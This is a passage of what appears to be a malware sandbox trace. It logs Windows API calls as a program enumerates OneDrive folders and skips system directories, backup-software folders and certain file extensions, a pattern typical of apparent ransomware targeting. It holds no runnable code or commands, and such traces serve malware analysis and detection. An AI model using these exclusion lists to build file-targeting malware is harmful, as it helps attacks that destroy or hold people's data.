(Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.678] FindNextFileW (in: hFindFile=0x2cf118, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0099.678] FindClose (in: hFindFile=0x2cf118 | out: hFindFile=0x2cf118) returned 1 [0099.678] FindNextFileW (in: hFindFile=0x2cf318, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0099.678] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0099.678] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.678] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0099.678] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.678] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0099.678] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0099.679] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.679] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0099.680] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KK\\") returned 0x4b [0099.680] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0099.680] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf1d8 [0099.699] FindNextFileW (in: hFindFile=0x2cf1d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.700] FindNextFileW (in: hFindFile=0x2cf1d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.702] FindNextFileW (in: hFindFile=0x2cf1d8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0099.703] FindClose (in: hFindFile=0x2cf1d8 | out: hFindFile=0x2cf1d8) returned 1 [0099.703] FindNextFileW (in: hFindFile=0x2cf318, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0099.703] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf358 [0099.706] FindNextFileW (in: hFindFile=0x2cf358, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.706] FindNextFileW (in: hFindFile=0x2cf358, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0099.706] FindClose (in: hFindFile=0x2cf358 | out: hFindFile=0x2cf358) returned 1 [0099.706] FindNextFileW (in: hFindFile=0x2cf318, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 0 [0099.706] FindClose (in: hFindFile=0x2cf318 | out: hFindFile=0x2cf318) returned 1 [0099.706] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0099.706] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\*.*", lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 0x2cf818 [0099.706] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.274] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0100.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0100.274] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.274] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfbd8 [0100.292] FindNextFileW (in: hFindFile=0x2cfbd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.292] FindNextFileW (in: hFindFile=0x2cfbd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="ADML", cchCount2=4) returned 3 [0100.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ADML", cchCount2=4) returned 3 [0100.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 3 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 3 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 1 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 3 [0100.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ONEDRIVE.ADML", cchCount2=13) returned 3 [0100.295] FindNextFileW (in: hFindFile=0x2cfbd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="ADMX", cchCount2=4) returned 3 [0100.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, 